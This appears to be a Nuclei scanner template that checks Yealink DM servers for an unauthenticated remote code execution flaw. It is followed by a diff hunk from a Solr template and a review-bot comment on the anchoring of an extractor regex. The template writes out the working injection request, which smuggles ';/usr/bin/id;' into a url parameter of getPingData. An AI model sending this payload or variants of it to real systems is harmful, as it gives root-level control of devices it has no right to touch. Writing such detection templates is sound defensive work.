severity: critical
description: A malicious actor can trigger Unauthenticated Remote Code Execution
tags: cve,cve2021,rce,yealink
reference: https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
requests:
- method: GET
path:
- "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
matchers-condition: and
matchers:
- type: word
condition: and
part: body
words:
- 'uid'
- 'gid'
- 'groups'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "(u|g)id=.*"


@ -26,13 +26,14 @@ requests:
Accept-Language: en Accept-Language: en
Connection: close Connection: close
extractors: extractors:
- type: regex - type: regex
regex: internal: true
- '"status"\:\{"(.*?)"\:\{"name"'
name: core name: core
group: 1 group: 1
internal: true regex:
- '"name"\:"(.*?)"'
matchers: matchers:
- type: word - type: word
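Review bot: The replacement extractor regex `'"name"\:"(.*?)"'` captures the first `"name":"…"` anywhere in the response, whereas the removed `'"status"\:\{"(.*?)"\:\{"name"'` was anchored to the core status object; if the response carries another `name` field before the core entry, `core` is populated with the wrong value and the follow-up request targets a core that does not exist. Either keep a small anchor such as `'"status"\:\{"(.*?)"\:'` or add a comment above the extractor stating which endpoint the first request hits and why its first `name` is the core name, so the assumption is checkable. The `\:` escape is unnecessary in Go regex but harmless. The same change is made in the other Solr template at the top of this commit page, and the request producing this response starts above the hunk.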
